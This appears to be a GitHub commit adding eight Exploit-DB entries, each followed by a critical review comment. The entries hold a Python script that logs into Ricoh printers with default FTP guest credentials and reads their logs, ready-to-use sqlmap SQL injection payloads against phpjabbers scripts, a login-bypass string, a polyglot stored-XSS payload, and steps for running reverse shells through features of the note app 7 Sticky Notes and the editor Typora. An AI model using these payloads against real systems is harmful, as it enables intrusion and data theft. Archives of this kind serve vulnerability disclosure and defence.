forked from offensive-security/exploitdb
10 changes to exploits/shellcodes/ghdb
Ricoh Printer - Directory and File Exposure
Blood Bank & Donor Management System using v2.2 - Stored XSS
Equipment Rental Script-1.0 - SQLi
Bank Locker Management System - SQL Injection
Fundraising Script 1.0 - SQLi
PHP Shopping Cart 4.2 - Multiple-SQLi
7 Sticky Notes v1.9 - OS Command Injection
Typora v1.7.4 - OS Command Injection
Exploit-DB committed Jan 30, 2024
1 parent 967f9d1, commit a5920da
Showing 10 changed files with 270 additions and 0 deletions.
@@ -0,0 +1,52 @@ | ||
#Exploit Title: Ricoh Printer Directory and File Exposure | ||
#Date: 9/15/2023 | ||
#Exploit Author: Thomas Heverin (Heverin Hacker) | ||
#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers | ||
#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py | ||
#Version: Ricoh Printers - All Versions | ||
#Tested on: Windows | ||
#CVE: N/A | ||
|
||
#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log) | ||
|
||
from ftplib import FTP | ||
|
||
def ftp_connect(ip): | ||
try: | ||
ftp = FTP(ip) | ||
ftp.login("guest", "guest") | ||
print(f"Connected to {ip} over FTP as 'guest'") | ||
return ftp | ||
except Exception as e: | ||
print(f"Failed to connect to {ip} over FTP: {e}") | ||
return None | ||
|
||
if __name__ == "__main__": | ||
target_ip = input("Enter the Ricoh Printer IP address: ") | ||
|
||
ftp_connection = ftp_connect(target_ip) | ||
if ftp_connection: | ||
try: | ||
while True: | ||
file_list = ftp_connection.nlst() | ||
print("List of Ricoh printer files and directories:") | ||
for index, item in enumerate(file_list, start=1): | ||
print(f"{index}. {item}") | ||
|
||
file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1 | ||
if file_index < 0: | ||
break | ||
|
||
if 0 <= file_index < len(file_list): | ||
selected_file = file_list[file_index] | ||
lines = [] | ||
ftp_connection.retrlines("RETR " + selected_file, lines.append) | ||
print(f"Contents of '{selected_file}':") | ||
for line in lines: | ||
print(line) | ||
else: | ||
print("Invalid file index.") | ||
except Exception as e: | ||
print(f"Failed to perform operation: {e}") | ||
finally: | ||
ftp_connection.quit() |
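Review bot: the header's `#Version: Ricoh Printers - All Versions` and `#CVE: N/A` are not supported by anything in the file; the script only shows that an FTP service which still accepts the default `guest`/`guest` login exposes the directories listed in the comment (`Help`, `Info`, `Prnlog`, `Stat`, `Syslog`), so the header should name the models and firmware actually tested and state the precondition (FTP enabled, default guest account not disabled), which is also the remediation for operators. In the main loop, a non-numeric answer to the `input()` prompt raises `ValueError` at `int(...)`, which is caught by the outer `except Exception` and ends the whole session through `finally: ftp_connection.quit()` instead of re-prompting; the same abort happens when the user picks one of the directory entries returned by `nlst()`, since `RETR` on a directory is typically refused by the server. Move the `try/except` inside the `while True:` body (or validate the input before calling `int()`) so that one bad selection does not terminate the listing.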
@@ -0,0 +1,32 @@ | ||
## Title: Equipment Rental Script-1.0 - SQLi | ||
## Author: nu11secur1ty | ||
## Date: 09/12/2023 | ||
## Vendor: https://www.phpjabbers.com/ | ||
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo | ||
## Reference: https://portswigger.net/web-security/sql-injection | ||
|
||
## Description: | ||
The package_id parameter appears to be vulnerable to SQL injection | ||
attacks. The payload ' was submitted in the package_id parameter, and | ||
a database error message was returned. You should review the contents | ||
of the error message, and the application's handling of other input, | ||
to confirm whether a vulnerability is present. The attacker can steal | ||
all information from the database! | ||
|
||
[+]Payload: | ||
mysql | ||
|
||
Parameter: #1* ((custom) POST) | ||
Type: error-based | ||
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) | ||
Payload: package_id=(-4488))) OR 1 GROUP BY | ||
CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0 | ||
END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING | ||
MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00 | ||
|
||
## Reproduce: | ||
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0 | ||
|
||
System Administrator - Infrastructure Engineer | ||
Penetration Testing Engineer | ||
home page: https://www.nu11secur1ty.com/ |
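Review bot: the `## Description:` block is a scanner template rather than a finding: "You should review the contents of the error message ... to confirm whether a vulnerability is present" is advice addressed to the tester, and "The attacker can steal all information from the database!" is asserted without any evidence from the `mysql` output that follows. The sqlmap block identifies `Parameter: #1* ((custom) POST)` but never states the URL or script that receives the POST, so a reader cannot tell which endpoint handles `package_id`; add the request line, say whether authentication is needed, and note that the trailing `from(select(sleep(20)))` is a time-based marker unrelated to the error-based technique named in `Title:`. On the vendor side the fix is binding `package_id` as a parameter of a prepared statement instead of interpolating it into the query; the report should mention that so the `## Reproduce:` link is not the only actionable content.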
@@ -0,0 +1,17 @@ | ||
# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS | ||
# Application: Blood Donor Management System | ||
# Version: v2.2 | ||
# Bugs: Stored XSS | ||
# Technology: PHP | ||
# Vendor Homepage: https://phpgurukul.com/ | ||
# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/ | ||
# Date: 12.09.2023 | ||
# Author: SoSPiro | ||
# Tested on: Windows | ||
|
||
#POC | ||
======================================== | ||
1. Login to admin account | ||
2. Go to /admin/update-contactinfo.php | ||
3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload. | ||
4. Go to http://bbdms.local/inedx.php page and XSS will be triggered. |
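Review bot: step 4 points to `http://bbdms.local/inedx.php`, which is almost certainly a typo for `index.php`. Because the PoC starts with "Login to admin account", the header should state that this is an authenticated (admin) stored XSS in `/admin/update-contactinfo.php` and name which field was actually confirmed, since step 3 offers three alternatives ("Adress", "Email id", "Contact Number"). The title "Blood Bank & Donor Management System using v2.2" has a stray "using". No fixed version and no remediation are given: the payload firing on the public index page shows the stored contact values are echoed without output encoding, so the fix is contextual escaping at the point of output (e.g. `htmlspecialchars` with `ENT_QUOTES`) and the impact should be described as affecting every visitor of the front page, not the admin who entered the value.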
@@ -0,0 +1,29 @@ | ||
# Exploit Title: Bank Locker Management System - SQL Injection | ||
# Application: Bank Locker Management System | ||
# Date: 12.09.2023 | ||
# Bugs: SQL Injection | ||
# Exploit Author: SoSPiro | ||
# Vendor Homepage: https://phpgurukul.com/ | ||
# Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/ | ||
# Tested on: Windows 10 64 bit Wampserver | ||
|
||
## Description: | ||
This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application. | ||
|
||
## Vulnerability Details: | ||
- **Application Name**: Bank Locker Management System | ||
- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/) | ||
- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/) | ||
|
||
## Vulnerability Description: | ||
The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields: | ||
|
||
Payload: admin' or '1'='1-- - | ||
|
||
An attacker can gain unauthorized access to the application with administrative privileges. | ||
|
||
## Proof of Concept (PoC): | ||
1. Visit the application locally at http://blms.local (assuming it's hosted on localhost). | ||
2. Navigate to the "banker" directory: http://blms.local/banker/ | ||
3. In the login and password fields, input the following payload: | ||
4. admin' or '1'='1-- - |
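Review bot: step 4 of the PoC is the payload itself rather than a step, so the list should be three steps with the payload shown under step 3; both the PoC and `## Vulnerability Description:` say "login and password fields" but neither names the POST parameters or the script under `/banker/` that builds the query, so add the request. The "critical" rating and "administrative privileges" claim need to be tied to evidence: the payload `admin' or '1'='1-- -` suggests the username is concatenated into the SQL text and that the password check is also performed inside that query, so state which account the bypass lands in and whether the `admin` username has to exist. Remediation is missing entirely: the login query should use a prepared statement, and the password should be checked with `password_verify()` against a stored hash instead of being compared inside the SQL.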
@@ -0,0 +1,29 @@ | ||
## Title: Fundraising Script-1.0 SQLi | ||
## Author: nu11secur1ty | ||
## Date: 09/13/2023 | ||
## Vendor: https://www.phpjabbers.com/ | ||
## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo | ||
## Reference: https://portswigger.net/web-security/sql-injection | ||
|
||
## Description: | ||
The `cid` parameter appears to be vulnerable to SQL injection attacks. | ||
The payload ' was submitted in the cid parameter, and a database error | ||
message was returned. | ||
The database is empty, but if it is not, this will be over for the | ||
money of the donors and their bank accounts! | ||
The attacker can steal all information from the database! | ||
|
||
[+]Payload: | ||
mysql | ||
|
||
Parameter: cid (GET) | ||
Type: error-based | ||
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) | ||
Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT | ||
(ELT(1741=1741,1))),0x7162787171),3873)) | ||
|
||
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0 | ||
|
||
System Administrator - Infrastructure Engineer | ||
Penetration Testing Engineer | ||
nu11secur1ty <http://nu11secur1ty.com/> |
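Review bot: the sentence "The database is empty, but if it is not, this will be over for the money of the donors and their bank accounts!" in `## Description:` is speculation that contradicts the evidence line before it and should be replaced with what the error-based extraction actually returned. The sqlmap block gives `Parameter: cid (GET)` with `controller=pjFront&action=pjActionLoadCampaign` but not the script path the query string is sent to, and the GitHub link above the signature lacks the `## Reproduce:` heading the author's other reports use. Missing as well is any remediation: `cid` is evidently used as an integer identifier, so the vendor fix is a parameterized query (and casting the value to int before use), which the report should say.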
@@ -0,0 +1,45 @@ | ||
## Title: PHP Shopping Cart-4.2 Multiple-SQLi | ||
## Author: nu11secur1ty | ||
## Date: 09/13/2023 | ||
## Vendor: https://www.phpjabbers.com/ | ||
## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing | ||
## Reference: https://portswigger.net/web-security/sql-injection | ||
|
||
## Description: | ||
The `id` parameter appears to be vulnerable to SQL injection attacks. | ||
A single quote was submitted in the id parameter, and a database error | ||
message was returned. Two single quotes were then submitted and the | ||
error message disappeared. The attacker easily can steal all | ||
information from the database of this web application! | ||
WARNING! All of you: Be careful what you buy! This will be your responsibility! | ||
|
||
[+]Payload: | ||
mysql | ||
|
||
Parameter: id (GET) | ||
Type: boolean-based blind | ||
Title: OR boolean-based blind - WHERE or HAVING clause (NOT) | ||
Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT | ||
3795=3795-- sRcp&session_id= | ||
|
||
Type: error-based | ||
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or | ||
GROUP BY clause (GTID_SUBSET) | ||
Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND | ||
GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT | ||
(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id= | ||
|
||
Type: time-based blind | ||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) | ||
Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND | ||
(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id= | ||
|
||
## Reproduce: | ||
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2 | ||
|
||
## Proof and Exploit: | ||
https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html | ||
|
||
System Administrator - Infrastructure Engineer | ||
Penetration Testing Engineer | ||
nu11secur1ty <http://nu11secur1ty.com/> |
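Review bot: the title's "Multiple-SQLi" overstates what the payload section shows: all three sqlmap entries (boolean-based blind, error-based, time-based blind) target the same parameter, `id` in `action=pjActionGetStocks`, so this is one injection point confirmed by three techniques, and the title and description should say so. The line "WARNING! All of you: Be careful what you buy! This will be your responsibility!" is editorial rather than a finding and does not belong in `## Description:`. Still missing: the script path that receives the query string, whether `session_id=` must carry a valid value, and a fixed version. On remediation, the vendor fix is a parameterized query for `id`; for operators it is worth noting that suppressing database error output only removes the error-based technique, while the boolean- and time-based payloads listed here still work against an unpatched install.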
@@ -0,0 +1,22 @@ | ||
# Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection | ||
# Discovered by: Ahmet Ümit BAYRAM | ||
# Discovered Date: 12.09.2023 | ||
# Vendor Homepage: http://www.7stickynotes.com | ||
# Software Link: | ||
http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe | ||
# Tested Version: 1.9 (latest) | ||
# Tested on: Windows 2019 Server 64bit | ||
|
||
# # # Steps to Reproduce # # # | ||
|
||
# Open the program. | ||
# Click on "New Note". | ||
# Navigate to the "Alarms" tab. | ||
# Click on either of the two buttons. | ||
# From the "For" field, select "1" and "seconds" (to obtain the shell | ||
within 1 second). | ||
# From the "Action" dropdown, select "command". | ||
# In the activated box, enter the reverse shell command and click the "Set" | ||
button to set the alarm. | ||
# Finally, click on the checkmark to save the alarm. | ||
# Reverse shell obtained! |
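Review bot: the steps describe a user who creates a note alarm, sets its `Action` to `command`, and types a command of their own choosing, which the program then runs under that same user account; nothing in the hunk crosses a trust boundary, so the "OS Command Injection" classification is not supported as written and the behaviour reads as a feature. To be a vulnerability the report needs to show untrusted input reaching that field, or a privilege difference between whoever sets the alarm and whoever the command runs as; state who creates the alarm, who executes it, and what the attacker gains that they did not already have. Formatting point: `# Software Link:` is followed by the URL on its own line, so the URL sits outside the comment.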
@@ -0,0 +1,18 @@ | ||
# Exploit Title: Typora v1.7.4 - OS Command Injection | ||
# Discovered by: Ahmet Ümit BAYRAM | ||
# Discovered Date: 13.09.2023 | ||
# Vendor Homepage: http://www.typora.io | ||
# Software Link: https://download.typora.io/windows/typora-setup-ia32.exe | ||
# Tested Version: v1.7.4 (latest) | ||
# Tested on: Windows 2019 Server 64bit | ||
|
||
# # # Steps to Reproduce # # # | ||
|
||
# Open the application | ||
# Click on Preferences from the File menu | ||
# Select PDF from the Export tab | ||
# Check the “run command” at the bottom right and enter your reverse shell | ||
command into the opened box | ||
# Close the page and go back to the File menu | ||
# Then select PDF from the Export tab and click Save | ||
# Reverse shell is ready! |
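Review bot: the steps have the user enable the "run command" option under Preferences > Export > PDF and enter their own command, which Typora then runs on export under the same account; no untrusted input is involved, so the "OS Command Injection" label is not supported by the hunk and the behaviour is a post-export hook the user configures. For this to be a finding, the report should show the command string arriving from outside the user's control, or a privilege boundary between who sets the preference and who performs the export. The steps also have "Select PDF from the Export tab" in step 3 and again in step 6, which reads as a duplicate; clarify that the first refers to the export settings page and the second to the actual export action.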